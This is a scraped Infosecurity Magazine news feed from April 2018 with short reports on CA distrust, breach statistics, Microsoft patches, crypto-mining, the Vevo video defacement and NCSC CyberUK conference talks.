Info Security

Subscribe to Info Security  feed
Updated: 2 hours 34 min ago

Google Will Distrust Additional CAs, IT Pros Predict

Thu, 04/12/2018 - 19:07
Google Will Distrust Additional CAs, IT Pros Predict

Although IT security professionals are troubled by future certificate authority (CA) incidents, very few have the tools needed to switch CAs quickly.

The finding is significant given that, last year, researchers affiliated with Google decided that Symantec, and their affiliated CAs, had mis-issued thousands of Transport Layer Security (TLS) certificates. As a result, Chrome researchers announced a formal plan to remove trust from Symantec-issued certificates. The first deadline is April 17, 2018, when Chrome 66 and Mozilla will distrust Symantec TLS certificates issued prior to June 1, 2016.

A study from Dimensional Research, which included responses from 1,100 IT security professionals, found that just 15% of respondents believe that Google's decision to distrust Symantec certificates is a one-time event. However, if they were affected by a major CA event, only 23% said they are completely confident in their ability to quickly find and replace all of their impacted certificates.

"CAs have a very difficult job and they deal with many complexities that are outside their control," said Mike Dodson, global head of solution architects for Venafi, which sponsored the report. "Every CA is exposed to risks; and CA compromises and errors can leave organizations scrambling to find and replace many certificates in a short amount of time. Organizations need greater control over the CAs they trust, but they also must acknowledge that they'll never have full control. For example, browsers play a big role in how we trust CAs. Chrome and Mozilla recently decided they would no longer trust certificates issued by Symantec, and now many organizations must replace these certificates before a set deadline."

Additional findings indicate that security professionals may be over-estimating their ability to respond to a CA incident: 61% of the respondents say they have a plan in place that would allow them to replace all Symantec certificates by the upcoming deadlines, but only 58% have an accurate inventory that includes the IP address of all devices where certificates that chain up to a Symantec root were installed.

Similarly, nearly two-thirds (62%) are confident they don't have certificates from unauthorized CAs, but only half have controls in place to detect this. Also, three-quarters (74%) believe they can find and replace all certificates affected by a CA compromise quickly, but only 8% have automated processes in place.

Categories: Cyber Risk News

UK Launches Offensive Cyber-Weapons Against Islamic State

Thu, 04/12/2018 - 19:00
UK Launches Offensive Cyber-Weapons Against Islamic State

The GCHQ, in partnership with the Ministry of Defence, has conducted a major offensive cyber-campaign against Daesh, aka the Islamic State/ISIS terror group. This marks the first time the UK has systematically and persistently attacked an adversary’s online efforts as part of a wider military campaign, according to the new GCHQ director, Jeremy Fleming.

“These operations have made a significant contribution to coalition efforts to suppress Daesh propaganda, hindered their ability to coordinate attacks, and protected coalition forces on the battlefield,” the former MI5 agent said, speaking at a UK cybersecurity showcase, CYBERUK2018. “The outcomes of these operations are wide-ranging. We may look to deny service, disrupt a specific online activity, deter an individual or a group or perhaps even destroy equipment and networks.” 

He said that the operation was hugely successful, noting that in 2017 there were times when Daesh members found it “almost impossible to spread their hate online, to use their normal channels to spread their rhetoric or trust their publications.”

The campaign, which shows how targeted and effective offensive cyber-attacks can be, is part of a wider effort that also includes the efforts by service providers to remove Daesh material from their sites.

Offensive cyber-capabilities have been controversial, both in the UK and across the globe, with detractors noting that should these weapons fall into the wrong hands, as was the case with NSA hacking tools like EternalBlue, the damage could be catastrophic.  

“We know that these capabilities are very powerful,” said Fleming. “The international doctrine governing their use is still evolving. And as with all of our work we only use them in line with domestic and international law, when our tests of necessity and proportionality have been satisfied, and with all the usual oversight in place.”

Categories: Cyber Risk News

Developers Failing to Use Secure Open Source Components

Thu, 04/12/2018 - 09:40
Developers Failing to Use Secure Open Source Components

Only half of developers using open source components in their software update them to use the most secure version, according to CA Veracode.

The security firm polled 400 app developers from the UK, US and Germany and found just 52% update these components when a new vulnerability is announced.

This could be exposing organizations to serious risks, given the ubiquity of third-party components in modern code. The research revealed that 83% of respondents use either commercial and/or open source components, with an average of 73 used per application.

It’s a widespread practice in DevSecOps as it helps to accelerate time-to-market and improve efficiency, but can lead to flaws sneaking into the code base.

Some 71 vulnerabilities per application are introduced on average through use of third-party components, with only 23% of respondents claiming they test for bugs in components at every release.

“We know that developers care about creating great code, and that means creating secure code,” said Pete Chestna, director of developer engagement, CA Veracode. “In order to be successful, developers need to have clarity on the security policy and the tools to measure against it. When the goal is clear and we give developers access to those tools, they are able to integrate scanning earlier into the software development lifecycle and make informed decisions that take security into consideration. Through this, we see a marked improvement in secure software development and the resulting outcomes.”

The findings chime with separate research from Sonatype, which revealed that one in eight open source components downloaded in the UK last year contained vulnerabilities, a 120% year-on-year increase.

The vendor claimed that 80%-90% of every modern application is made up of open source components, but argued that manual processes and a lack of built-in security controls mean many developers are exposing themselves to unnecessary cyber-risk.

Categories: Cyber Risk News

Human Error Dominates as Breached Records Soar 88% in 2017

Thu, 04/12/2018 - 09:16
Human Error Dominates as Breached Records Soar 88% in 2017

Around 2.6 billion records were stolen in 2017, an 88% increase on the previous year’s figures, according to Gemalto.

The security firm’s 2017 Breach Level Index Report comprised data from publicly reported breaches around the world.

It revealed the US in first place, accounting for 1453 such data breaches, while the UK came a distant second with 80. Despite this, the number of records compromised in 2017 in the UK actually fell from 54.5 million in 2016 to 33.1 million.

It predicted that the number of reported breaches will rise sharply next year when the EU General Data Protection Regulation (GDPR) comes into force, mandating breach notification.

“On the face of it, UK organizations’ security and data protection seem to be improving. However, with GDPR on the horizon it’s likely that the total amount of lost data will rise nearer in line with the US, who have had to publicly reveal breaches for a number of years,” claimed Gemalto director of product strategy, Joe Pindar.

The headline figure of 2.6 billion records stolen seems at odds with a recent IBM report, which claimed breaches had fallen by 25% from a high of four billion in 2016. However, a Gemalto spokesperson confirmed to Infosecurity that IBM is likely to have included the Yahoo mega-breaches revealed in 2016 but which actually occurred in preceding years.

Gemalto “only tracks breaches that were disclosed and occurred in any given year,” they said.

Elsewhere the trends seem to tally with IBM and Verizon’s latest DBIR, which revealed human error and internal threats to be a major source of cyber-risk for organizations.

Accidental loss, comprising improper disposal of records, misconfigured databases and other issues, caused the exposure of 1.9 billion records – a 580% increase in the number of compromised records from 2016, according to Gemalto.

As if to confirm the severity of the insider threat, while malicious outsiders (72%) were the leading source of data breaches, these comprised only 23% of all compromised data. On the other hand, accidental loss was the cause of 18% of data breaches, but accounted for 76% of all compromised records.

“Worryingly, for UK organizations, is the number of records being compromised due to accidental loss. Companies are clearly not controlling or even knowing where their sensitive customer data is, so when it comes to complying with key aspects of GDPR like the ‘Right to be Forgotten,’ what hope is there that they will be able to remove customer data from all of their systems?” said Pindar.

“Whilst human error is something that all organizations have to deal with, if it’s not correctly encrypted, data can easily be compromised if it gets into the wrong hands. With just over a month to go, UK businesses don’t have a lot of time to get important points like this right.”

Like Verizon, Gemalto also found healthcare (27%) to be the hardest hit by breaches, followed by financial services (12%), education (11%) and government (11%).

Categories: Cyber Risk News

NCSC: New Categorization Framework Will Improve Cyber-Response

Thu, 04/12/2018 - 08:50
NCSC: New Categorization Framework Will Improve Cyber-Response

A new cyber-incident categorization framework will help government agencies and law enforcers collaborate and respond to attacks more effectively, the National Cyber Security Centre (NCSC) has announced today.

The GCHQ body made the launch at its flagship conference CYBERUK 2018 in Manchester today.

It said the new framework would expand attack categories from the previous three to six, improving consistency, and ensuring better use of resources and improved collaboration between the likes of the NCSC, National Crime Agency (NCA) and police.

“This is a hugely important step forward in joint working between law enforcement and the intelligence agencies,” said National Police Chiefs' Council lead for cybercrime, Peter Goodman.

“Sharing a common lexicon enables a collaborative understanding of risk and severity that will ensure that we provide an effective, joined-up response. This is good news for the safety of our communities, business and individuals.”

The new framework ranks incidents from category one – a national cyber-emergency requiring immediate cross-government coordination – down to category six – a localized incident on an individual or SME which only requires automated protection advice or a local police response.

The NCSC claimed that any online attack which may have a national impact should be reported to it immediately. According to the new framework that means a category 1-3 incident.

Anything below that “national impact threshold” should be reported to Action Fraud.

The NCA is likely to be involved in most categories of incident except six, whether leading the response or coordinating with local police and regional organized crime units (ROCUs).

The NCSC claimed it has responded to more than 800 “significant” incidents since its inception in October 2016. These are either category two or three according to the new framework, having a serious impact on central or local government, UK essential services, a large proportion of the UK population, the UK economy or a large organization.

“This new framework will ensure we are using the same language to describe and prioritize cyber threats, helping us deliver an even more joined up response,” said NCA deputy director, Ollie Gower.

“I hope businesses and industry will be encouraged to report any cyber-attacks they suffer, which in turn will increase our understanding of the cyber threat facing the UK.”

It’s unclear whether the new framework has come about as a result of the NIS Directive, but the new EU rules introduced from early May will certainly force member state governments to lead a more coordinated and effective response to major cyber-incidents.

Categories: Cyber Risk News

65% of UK CISOs Worried About Global Skills Shortage

Wed, 04/11/2018 - 14:35
65% of UK CISOs Worried About Global Skills Shortage

A new survey from Bitdefender has revealed that more than half of CISOs worldwide (65% in the UK) are worried about the global skills shortage.

As outlined in CISOs’ Toughest Dilemma: Prevention Is Faulty, yet Investigation Is a Burden, the cybersecurity tech company quizzed 1050 people responsible for purchasing IT security within companies in the US and Europe to explore CISOs’ needs in the prevention-detection-response-investigation era.

The research showed how a lack of visibility, speed and personnel affects the development of stronger security practices in companies, leaving CISOs feeling over-burdened and under-resourced: almost 70% of respondents stated their team is under-resourced and 72% admitted their team had experienced agent and alert fatigue.

What’s more, 50% of CISOs said their organization suffered a breach in the past 12 months, whilst one in sixth of those did not know how the breach occurred. That concerning trend looks set to continue too, with a quarter of all respondents saying their company is likely to face an ongoing security breach without them knowing it.

“Today’s resource- and skill-constrained IT security teams need an endpoint detection and response (EDR) approach that allows for less human intervention and a higher level of fidelity in incident investigations,” Bitdefender’s VP of enterprise solutions Harish Agastya said. “EDR for everyone can be achieved through a funnel-based approach of prevention-detection-investigation-response, leaving the EDR layer to focus on threats further down the funnel in the unknown or potential threat category, and IT teams to focus solely on the alerts and tasks that are truly significant.”

Speaking to Infosecurity Adrian Davis, director of cybersecurity advocacy for EMEA, (ISC)2 added that the continuing cyber-skills shortage is often portrayed as being caused by a supply-side problem, but recent research indicates it is also a failure of talent retention.

“Part of the solution to this is to realize that cyber-threats are now a key business risk comparable to financial and legal risks and thus make it part of the central risk management strategy, giving cyber professionals a vital role to play and a stronger voice within the organization.

“Organizations must get more creative at recruiting cyber professionals and change their recruitment checklist and interview process to look for attributes and skillsets, rather than previous experience. Recruiting exclusively from people with previous experience not only means failing to diversify the workforce, but it also means fishing in a very shallow pool of talent.”

Categories: Cyber Risk News

Over 20 Critical Microsoft Patches to Apply This Month

Wed, 04/11/2018 - 10:36
Over 20 Critical Microsoft Patches to Apply This Month

Microsoft has fixed 65 vulnerabilities this month, over a third of which are critical and stretch across OS, browser and Office environments.

One of the most important fixes of this month’s security update round was released out-of-band in March. CVE-2018-1038 fixed a bad patch rolled out in January and should be a “top priority” for Windows 7 for x64-based Systems or Windows Server 2008 R2 for x64-based Systems, according to Ivanti director of product management, security, Chris Goettl.

He claimed that critical flaws in the OS, browser and Office would keep admins busy this month.

“There are multiple critical vulnerabilities in the Windows Operating System, Internet Explorer and Edge browsers, and on Office this month,” Goettl explained. “There are a few critical kernel vulnerabilities resolved, several Microsoft graphics and TrueType font driver vulnerabilities resolved and a host of critical browser vulnerabilities resolved.”

Elsewhere, Microsoft has disclosed but not patched an Important rated SharePoint elevation of privilege bug (CVE-2018-1034) which has been publicly disclosed but not exploited yet in the wild.

Greg Wiseman, senior security researcher at Rapid7 highlighted an unusual patch for a Microsoft Wireless Keyboard 850 vulnerability.

“CVE-2018-8117 is a security feature bypass vulnerability, where an attacker able to extract the encryption key from a keyboard could then wirelessly send and/or read keystrokes, potentially reading sensitive data such as passwords or issuing malicious commands to a connected system,” he explained.

“At a high level, there's nothing out of the ordinary this month. Unfortunately, that means that the majority of the patched vulnerabilities are once again of the worst variety: Remote Code Execution (RCE).”

Also this month, Microsoft finally removed its AV compliance key restriction designed to prevent BSOD crashes when installing Meltdown/Spectre updates.

Alongside Microsoft there are the ubiquitous Adobe updates for system administrators to deal with this month.

The firm has patched 19 vulnerabilities in Flash Player, Experience Manager, InDesign, Digital Editions, Coldfusion, and the PhoneGap Push Plugin, six of which are critical.

Categories: Cyber Risk News

Zuckerberg: We're in “Arms Race” with Russian Election Meddlers

Wed, 04/11/2018 - 10:05
Zuckerberg: We're in “Arms Race” with Russian Election Meddlers

Facebook CEO Mark Zuckerberg has claimed the firm is in an arms race with Russian hackers attempting to influence the outcome of elections.

Speaking at a much-anticipated Capitol Hill grilling by senators, the social network’s founder revealed that the firm had launched an investigation into the scandal.

“One of my greatest regrets in running the company is that we were slow in identifying the Russian information operations in 2016,” he told Congress.

“There are people in Russia whose job it is to try to exploit our systems and other internet systems and other systems as well. This is an ongoing arms race. As long as there are people sitting in Russia whose job is it to try to interfere in elections around the world, this is going to be an ongoing conflict.”

Zuckerberg also revealed that Facebook is helping special counsel Robert Mueller’s team with their investigation in election meddling.

As well as Russian interference in the US election, the session of several US senate committees was assembled to quiz the Facebook boss on the Cambridge Analytica scandal, in which data on 87 million users allegedly ended up in the hands of political consulting firm Cambridge Analytica.

Former director of research at the firm, Christopher Wylie, told a House of Commons committee he believes this information enabled Donald Trump to get elected as well as the Vote Leave EU referendum campaign.

Zuckerberg again apologized for the mistakes which led to the data leak: in its terms of service at the time which allowed developers to collect data on users’ Facebook friends and in trusting that Cambridge Analytica had deleted that data, which enabled it to build a “psychological warfare” tool for the targeting of political advertising.

“When we heard back from Cambridge Analytica that they had told us that they weren’t using the data and deleted it, we considered it a closed case,” he told senators. “In retrospect, that was clearly a mistake. We shouldn’t have taken their word for it. We’ve updated our policy to make sure we don’t make that mistake again.”

Categories: Cyber Risk News

Home Secretary Announces Police Crackdown on Dark Web

Wed, 04/11/2018 - 09:25
Home Secretary Announces Police Crackdown on Dark Web

The home secretary will today announce a new multi-million-pound crackdown on illegal dark web activity, although the plan is light on details.

Speaking at the National Cyber Security Centre’s CYBERUK conference in Manchester today, Amber Rudd is expected to say that the Home Office is releasing £9m to support police efforts at tackling cybercrime.

It’s unclear how much of that will be allocated to policing the dark web, something notoriously difficult thanks to anonymizing tools like Tor.

However, £5m will be spent on establishing dedicated cybercrime units at a regional and local level, with only 30% of forces currently having the capabilities they need, according to the government.

Rudd will describe the dark web as a “platform of dangerous crimes and horrific abuse” in which “a sickening shopping list of services and products are available.”

However, the speech – seen in advance by Infosecurity – is light on details. Where US law enforcers have had breakthroughs in the past it has usually been after criminals made mistakes in the physical world, allowing them to infiltrate networks and catch suspects.

For example, one drug dealer was caught after eagle-eyed postal workers’ suspicions were raised when he handed over dark web packages for delivery, whilst wearing latex gloves.

Rudd claimed the £9m is part of a previously announced £50m dedicated to improving police cybercrime resources in 2018/19. This will include development of a new national training program for police and the criminal justice system, and a £3m Cyber Aware campaign to educate the public and businesses on cybercrime issues.

Although politicians usually focus on paedophile rings and drug dealing marketplaces when they talk about the dark web, it’s also a hotbed for the trade of stolen or breached credentials.

In December, researchers found a trove of 1.4 billion breached credentials on the dark web, the largest of its kind ever found. Then, earlier this year, more researchers found 2.7 million stolen online account log-ins from Fortune 500 employees on a dark web site.

Rudd’s announcement comes after severe austerity-related policing cuts by the government were blamed on the dramatic recent rise in violent crimes in the UK.

A leaked Home Office report claimed that the cuts had “likely contributed” to the rise in crime, but Rudd has denied seeing the report.

Categories: Cyber Risk News

#CyberUK18: NSA Claims Attack Tactics Rarely Change

Wed, 04/11/2018 - 08:30
#CyberUK18: NSA Claims Attack Tactics Rarely Change

“Every day we’re battling a new cyber-threat, but the more that things change the more that they stay the same.”

Speaking at the CyberUK conference in Manchester, Dave Hogue, technical director of the NSA’s Cybersecurity Threat Operations Center (NCTOC) talked about a hack of the US Navy in 2012 that caused over $12m of damage and caused a network to be taken down twice, however in 2017 hackers used a known vulnerability to hit Equifax and it has cost over $600m to fix so far.

“These two stories, five years apart, are discretionally similar in nature,” he said. “We have sophisticated adversaries using unsophisticated means to cause great damage. In fact, I’ll tell you as the overseer of NSA’s operational teams, we have not responded to a zero-day in over 24 months.

“Adversaries are getting into networks using non-technical means, taking advantage of hardware and software technologies that are not compliant with the latest offerings, and taking advantage of bad security practices such as solutions that are no longer vendor-supported.”

Hough said that advice and solutions are widely available, such as application whitelisting, two-factor authentication and role-based access controls. “There are a lot of outdated things that are making a comeback,” he said. “How can we get a better focus that the security industry is not conveying? Are we making progress? Probably not.”

Hough called for a change in the paradigm, which he starts with everyone seeing themselves as part of operations “as the adversary goes after everything and everyone to achieve their objectives.”

He said that the second part is to be more predictive and preventative, and build layers of defenses to defeat common layers of attack. This includes better collaboration and working to build a picture “that involves working across industry, government and academia sectors to have thorough and sustained campaigns that make it costly for the adversary to operate.”

Categories: Cyber Risk News

Crypto-Mining Spikes 500% on Corporate Networks

Tue, 04/10/2018 - 20:07
Crypto-Mining Spikes 500% on Corporate Networks

The volume of crypto-mining transactions has grown, spiking almost 500% on corporate networks.

Cybersecurity firm Zscaler has blocked more than 2.5 billion crypto-mining attempts in the last six months. The spike, the firm said, is likely tied to the sharp increase in value of cryptocurrency (Bitcoin hit highs above $19,000 in December) and the fact that legitimate sites are adopting crypto-mining as a source of revenue instead of online advertisements.

Cybercriminals are of course also taking advantage of the trend by injecting JavaScript (JS) code into compromised legitimate sites to conduct crypto-mining activities unbeknownst to site owners and visitors. In some cases, malicious advertisements are being leveraged for browser-based crypto-mining activities.

The web-based mining kit known as Coinhive dominates the crypto-miner market, with the fastest growth and with the vast majority of crypto-miners in the enterprise traffic seen on the Zscaler cloud. The embedding of Coinhive in websites has evolved over time, the firm said, with numerous compromised sites now using JavaScript obfuscation and final code masquerading as Google analytics JS code to viewers.

The category of domains that were used most for browser-based mining activity include nudity/pornography and streaming media. The average browsing time for users on video-streaming sites tends to be higher, allowing miners to maximize their activity as users stay on these sites to view movies or play games. The professional services and marketing category sites ranked high as well, demonstrating the prevalence of mining activity on corporate networks.

“Enterprise networks are being impacted in various ways,” Zscaler said. “Unwanted and unidentified mining activity inside networks causes increased wear and tear on corporate hardware, as the mining increases CPU cycles. Mining activity also hogs corporate network bandwidth and causes performance issues.”

Categories: Cyber Risk News

Orgs Are Holding Back on Cloud-Based Security

Tue, 04/10/2018 - 19:30
Orgs Are Holding Back on Cloud-Based Security

Enterprises are adopting the cloud much faster than their security teams can keep up – and misunderstanding about cloud environments is pervasive.

The 2018 Enterprise Cloud Trends Report from iboss surveyed IT decision makers and office workers in US enterprises and found that 64% of IT decision makers believe the pace of software as a service (SaaS) application adoption is outpacing their cybersecurity capabilities. Combined with growing pressures from shadow IT and mobile employees, 91% of IT decision makers agree they need to update security policies to protect their cloud-first environment.

However, there are also misconceptions when it comes to how much of a threat these challenges are. On average, IT decision makers believe 36% of remote workers bypass security policies; in reality, 48% of office worker respondents admit to bypassing remote work policies and 82% of office workers admit to going around their VPN when working remotely. About 62% of office workers have bypassed the IT department to access a new application, and nearly 80% of IT decision makers believe this type of shadow IT is a major security concern.

The results of the survey also show that approximately half of IT decision makers hesitate to move to cloud-based cybersecurity solutions. The primary concerns they had when evaluating the migration to cloud security were data privacy, cost of maintenance, cost of migration, concerns around legacy infrastructure integration and compliance and data protection regulations.

“This survey clearly shows that large organizations are facing many challenges that can be solved with cloud-based cybersecurity solutions, but they are holding back because of avoidable concerns,” said Paul Martini, CEO and co-founder, iboss. “Office workers are clearly demanding access to SaaS applications and remote work capabilities; the challenge now is to secure them effectively. iboss offers a cloud-based cybersecurity solution that eliminates the need to expose your data to a shared-cloud security service.”

Categories: Cyber Risk News

Organizations Failing at Timely Detection of Threats

Tue, 04/10/2018 - 19:21
Organizations Failing at Timely Detection of Threats

Detection and remediation capabilities still need work at most organizations: Less than half of all organizations in a benchmark survey from LogRhythm were able to detect a major cybersecurity incident within one hour. Even more concerning, more than two-thirds said that even if they detected a major incident, they would be unable to contain it within that same time frame.

The study surveyed 751 IT decision makers from the US, UK and Asia-Pacific and found that there are many factors that enable a security team to quickly detect and respond to an incident, including technology, process, programs and people.

When it comes to technology, a strong majority (nearly 80%) of IT executives said that a platform for security management, analysis and response is beneficial, though only about a third rate such a platform as “very” beneficial. This response may reinforce the notion that true security confidence cannot be created with technology alone.

When asked to consider how their organization is operating from a threat lifecycle management (TLM) perspective – as an approach that includes discovery, qualification, neutralization and recovery from cyber-attacks – IT executives were not overly optimistic. About a third of all respondents reported that they need help at virtually all stages in the TLM workflow, especially detecting, investigating, neutralizing and recovering from cyber-threats.

“Cyber-threats continue to grow in volume and intensity. Seemingly every month, another massive security breach dominates the headlines,” said Matt Winter, VP of marketing and business development at LogRhythm. “To combat these threats, organizations need to carefully plan their budgets and strategies while developing effective programs that tackle specific threats and keep them one step ahead of cyber-attackers.”

The survey also uncovered that many companies are focused on growing their security maturity, and team size is an important indicator. On average, companies employ 12 cybersecurity professionals in their organization. However, more than half of the respondents said that they employ 10 or fewer.

Special threat detection programs are another indicator of security maturity. This study found that most decision-makers – more than 70% of respondents – have programs in place to detect specific threats, such as ransomware, insider or employee threats, and denial of service (DoS) attacks. The vast majority of IT decision makers (95%) also use security software to prevent and react to threats. And more than a quarter deploy at least 10 security software solutions to manage security threats.

As a result of all of this, a majority of organizations are only moderately confident in their ability to protect their companies against hackers. When it comes to confidence levels, about half of security decision makers believe that a determined hacker can still breach their organization. In fact, over one-third reported that their company has experienced a breach in the past year –ranging from 29% in the United States to 39% in the Asia-Pacific region.

When specifically asked about level of confidence, these decision makers revealed that they have only moderately positive confidence in their cybersecurity measures and abilities, suggesting an attitude that is more hopeful than truly confident.

Similarly, most IT executives (over 60%) are only somewhat confident that their security software can detect all major breaches. Likewise, they are only moderately confident that they can protect their companies from hackers.

In addition, the level of confidence in one’s security is also swayed by other variables, such as the implementation of programs that target specific types of threats. For instance, decision makers who did not report having programs to protect against threats such as ransomware, insider threats and service-denial attacks are less confident in their security programs. Unsurprisingly, that same segment reported slower rates of detection, response and containment.

Categories: Cyber Risk News

#CyberUK NCSC Say Diversity Will Aid a Safer Britain

Tue, 04/10/2018 - 15:08
#CyberUK NCSC Say Diversity Will Aid a Safer Britain

In order for Britain to be safer, cybersecurity needs to be more agile and diverse.

Speaking at the CyberUK conference in Manchester, NCSC director of communications Nicola Hudson said that to build a safer digital Britain, “a cyber industry that is innovative, diverse and agile needs to be built.”

Focusing on the issue of diversity in the industry, Hudson said that people from a range of disciplines and backgrounds should be brought together to work on solving the issue.

“We are delighted to welcome people from all the professions that must come together to deliver effective security, not just those who might directly think of themselves as primarily security people,” she said.

“We also need to bring the widest pool of talent that we possibly can and that means we need a much more diverse workforce. As a public service organization, we need to reflect the population that we’re serving. A more diverse workforce is essential to this. It makes us more effective.”

Acknowledging that there is “no magic switch to improve on the lack of diversity in this sector,” Hudson welcomed steps by the NCSC as an organization which is “determined to look at diversity in its widest sense”. This was not just about the lack of women, but socio-economic factors, regional and cultural differences, disability, BAME and the LBGT community.

Hudson said: “We celebrate the diversity of thinking which has made the NCSC and GCHQ world-leaders. Without true diversity we are in danger of group-think, behavior challenges and quite frankly we will not tap into the skills we need. We are looking at immediate things we can do, medium term plans and generational change. All have their own challenges.”

Plans by the NCSC include looking at recruitment plans, and retaining the diverse pool of talent it requires. The CyberUK conference also features a “pledge wall” as a commitment by delegates to make an effort to increase the diversity of their workforce.

Speaking to Infosecurity, Hudson said that to be the best at cybersecurity, the most diverse group of people are needed who will  approach scenarios differently. “For me, diversity is at the heart of everything we are trying to do,” she said.

“This is not about the right thing to do, survey after survey and business after business proves that having a diverse workforce works. It is not just a ‘nice to have’, it is critical for success. As I said earlier, this is hard and we cannot do it ourselves – this is a community and if we work on it together, we will all benefit.”

Categories: Cyber Risk News

Cyber-Criminals Could Earn CEO-Level Salary: Report

Tue, 04/10/2018 - 13:01
Cyber-Criminals Could Earn CEO-Level Salary: Report

High-earning cyber-criminals make as much as $2m per year, almost as much as the average FTSE CEO, a new study from Bromium has claimed.

The security vendor commissioned Mike McGuire, senior lecturer in criminology at Surrey University, to produce the report, which is based on first-hand interviews with convicted cyber-criminals, and data from international law enforcers, financial institutions and the Dark Web.

The study, Into the Web of Profit, claimed that even “mid-level” hackers could earn as much as $900,000 annually – more than double the US presidential salary.

Those at the “entry-level” of their black hat trade can expect to make over $40,000, more than a UK university graduate.

The research highlights one of the problems facing the IT industry in recruiting those with the right skills – that there will be a significant minority potentially prepared to seek employment on the other side of the law.

The issue is especially acute in the public sector and across UK law enforcement, where austerity cuts mean forces can’t offer competitive salaries.

The staring salary for a National Crime Agency (NCA) trainee officer is just £23-£25,000, according to estimates.

There have even been plans mooted in the UK to draft in volunteers to help with policing cybercrime.

“Cybercrime is a lucrative business, with relatively low risks compared to other forms of crime. Cyber-criminals are rarely caught and convicted because they are virtually invisible. As criminals further monetize their business allowing anyone to buy pre-packaged malware or hire hackers on demand, the ability to catch the king-pins becomes even more challenging,” said Bromium CEO Gregory Webb.

“The cybersecurity industry, business and law enforcement agencies need to come together to disrupt hackers and cut off their revenue streams. By focusing on new methods of cybersecurity that protect rather than detect, we believe we can make cybercrime a lot harder.”

The report also detailed what cyber-criminals like to spend their ill-gotten gains on. Many (30%) look to invest in property, art or legitimate financial instruments, while others (20%) plough that money back into IT equipment.

However, a sizeable number (20%) also spend their money on drugs, prostitutes and the like, according to the report.

Categories: Cyber Risk News

Vevo YouTube Channels Suffer Music Video Hack

Tue, 04/10/2018 - 12:11
Vevo YouTube Channels Suffer Music Video Hack

Popular streaming service YouTube has confirmed hacking activity on a number of Vevo channels on its platform, affecting high-profile music videos.

A YouTube statement read: “After seeing unusual upload activity on a handful of Vevo channels, we worked quickly with our partner to disable access while they investigate the issue.” YouTube made clear that the issue has impacted Vevo specifically and not YouTube more broadly.

As detailed by the BBC, the videos for several hit songs, including ‘Despacito’, were defaced – the Despacito video has since been removed but the cover image featured a group wearing masks and pointing guns.

“The hackers, calling themselves Prosox and Kuroi'sh, had written ‘Free Palestine’ underneath the videos,” stated the BBC.

A Statement from Vevo added: “Vevo can confirm that a number of videos in its catalog were subject to a security breach today, which has now been contained. We are working to reinstate all videos affected and our catalog to be restored to full working order. We are continuing to investigate the source of the breach."

Mark James, security specialist at ESET, said the details currently surrounding the hack are sparse, so trying to figure out those responsible did or how they did it is not something that’s easily done.

“The problem with these types of hacks is the potential for damage caused,” he added.

However, Lee Munson, security researcher at Comparitech, was quick to point out the incident looks to be relatively benign in nature, featuring a fairly tame political message and motivated by the ‘fun’ of the challenge.

“In that respect then, it is in itself, nothing much to worry about for the video hosting site, though it does suggest that the defacement of videos is not technically difficult to achieve, given the number of high profile artists that have been targeted.

“What exactly YouTube is doing to prevent content like this appearing via Vevo is unclear but it will be interesting to see whether other hacktivists jump on the bandwagon and use such sites to make their points in the future.”

Categories: Cyber Risk News

YouTube Suffers Music Video Hack

Tue, 04/10/2018 - 12:11
YouTube Suffers Music Video Hack

Popular streaming service YouTube has suffered a hack of a number of its high-profile music videos, according to reports.

As detailed by the BBC, the videos for several hit songs, including ‘Despacito’, have been defaced – the Despacito video has since been removed but the cover image featured a group wearing masks and pointing guns, whilst other vidoes are supposed to still be live.

“The hackers, calling themselves Prosox and Kuroi'sh, had written ‘Free Palestine’ underneath the videos,” stated the BBC.

Mark James, security specialist at ESET, said the details currently surrounding the hack are sparse, so trying to figure out those responsible did or how they did it is not something that’s easily done.

“The problem with these types of hacks is the potential for damage caused. For YouTube it’s a brand and PR issue. For the artists it’s the personal damage of their brand being used for nefarious purposes,” he added.

However, Lee Munson, security researcher at Comparitech, was quick to point out the incident looks to be relatively benign in nature, featuring a fairly tame political message and motivated by the ‘fun’ of the challenge.

“In that respect then, it is in itself, nothing much to worry about for the video hosting site, though it does suggest that the defacement of videos is not technically difficult to achieve, given the number of high profile artists that have been targeted.

“What exactly YouTube is doing to prevent content like this appearing via Vevo is unclear but it will be interesting to see whether other hacktivists jump on the bandwagon and use such sites to make their points in the future.”

Categories: Cyber Risk News

#CyberUK18: Bank of England Calls for More Cyber Translators

Tue, 04/10/2018 - 11:02
#CyberUK18: Bank of England Calls for More Cyber Translators

Communication from the cybersecurity department to the board should consider their expertise and context – and not use jargon.

Speaking at the NCSC CyberUK Conference in Manchester, Joanna Place, deputy governor and chief operating officer at the Bank of England, said that “security is no different from other areas of expertise in terms of talking to the board.” This involves how much is being spent, what the risks are, if the actions are proportionate, whether there are the right skills and what the context of the issue is.

Place said that the role of the cyber expert is two-fold: to understand the threats and mitigate against them, and also to communicate that in a language that is understandable. “Your job as cyber experts is to tell the board what they need to know, not just answer the questions that they have,” Place added.

“You also need to be understood by each member of your business. If all of the knowledge and expertise resides with the cyber experts only, your business will be very vulnerable, so you need to be a cyber expert and a cyber translator.”

Place said that the board may not be cyber experts, but want assurance of what is being done for cyber-risks. “If they cannot understand what you are saying, they may think that you cannot communicate very well, but they may think that you don’t understand your subject and that will give them cause for concern.”

She also advised speaking the language of risk that the board will understand, using examples that make sense and “making sure they know what they need to know.”

Place also encouraged consideration of how boards receive information, and delivering that in a suitable format. She said that the Bank of England has “cyber translators” and she called on cyber experts to be cyber translators so that “everyone in the business can understand the security risks.”

In conclusion, Place told cyber experts to “take the board on the cybersecurity journey with you,” and give them assurance that you can articulate your knowledge.

“Know your subject, understand the business context and know the audience to whom you are speaking. Get the board and every employee to understand information security and their role in it. By sharing your knowledge you are going to reduce the risk your business faces and you’re going to become a much more effective cyber expert.”

Categories: Cyber Risk News

NCSC: UK Firms Face Rising Supply Chain Cyber-Threat

Tue, 04/10/2018 - 10:42
NCSC: UK Firms Face Rising Supply Chain Cyber-Threat

UK organizations are facing an unprecedented threat from cyberspace, according to the National Cyber Security Centre (NCSC).

The GCHQ body warned in a new report produced with the National Crime Agency (NCA) that UK businesses faced more attacks than ever before in 2017, with ransomware, supply chain attacks, data breaches and fake news all making a significant impact.

Between October 2016 when the NCSC was opened and the end of 2017, it recorded 34 “significant” cyber-attacks like WannaCry which required a cross-government response, and 762 less serious incidents.

The supply chain was highlighted as a particular area of risk – even for organizations with mature cybersecurity strategies.

“Supply chain compromises of managed service providers and legitimate software (such as MeDoc and CCleaner) provided cyber-adversaries with a potential stepping stone into the networks of thousands of clients, capitalizing on the gateways provided by privileged accesses and client/supplier relationships,” the report noted.

